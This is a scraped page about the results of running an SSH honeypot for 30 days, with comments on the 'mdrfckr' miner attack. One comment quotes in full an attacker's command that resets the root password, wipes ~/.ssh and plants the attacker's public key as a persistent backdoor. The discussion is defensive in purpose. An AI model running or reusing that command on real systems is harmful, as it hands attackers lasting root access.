What is a honeypot?A honeypot detects and records attacks when an attacker tries to break into a system.  The honeypot we will discuss here is an SSH honeypot. Environment12OS: Ubuntu 24.04 LTS x86_6

Hacker News is a community-driven platform for sharing and discussing technology news, startups, and programming-related topics. Through user submissions and comments, Hacker News offers insights into emerging technology trends, industry developments, and entrepreneurial ventures. Readers can participate in discussions, share their insights, and stay informed about the latest advancements in technology and innovation.

Hacker News

This post discusses the results of running an SSH honeypot for 30 days, including the number of login attempts and information about the attackers' tactics.

What You Get After Running an SSH Honeypot for 30 Days

I actually have had encountered the “mdfckr” miner attack when we (stupidly) booted a personal server and forgot to change the lame password we put in the beginning. When I was pulling some logs and stats, I noticed the foreign ssh key and the cron job. Fortunately we isolated it and it did not access anything else on the local network. Lesson learned😁.

The mdfckr bit had sounded vaguely familiar. I ended up finding a <a href="https://www.reddit.com/r/masterhacker/comments/jweero/i_got_hacked_by_a_real_mdrfckr/" target="_blank" rel="noopener nofollow">reddit post from a few years back</a> that had also mentioned this.
From the post:
<blockquote>
It looks like they will add their ssh key to have access to the system later…
<code>echo &quot;root:ZhEVRp3rV2wy&quot;|chpasswd|bashcd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr&quot;&gt;&gt;.ssh/authorized_keys &amp;&amp; chmod -R go= ~/.ssh &amp;&amp; cd ~ </code>
</blockquote>
Interesting to see small changes, but most of ssh lockout attempt remaining mostly unchanged.

This is great. How did they successfully login, did they just dictionary attack a username/password combo or…?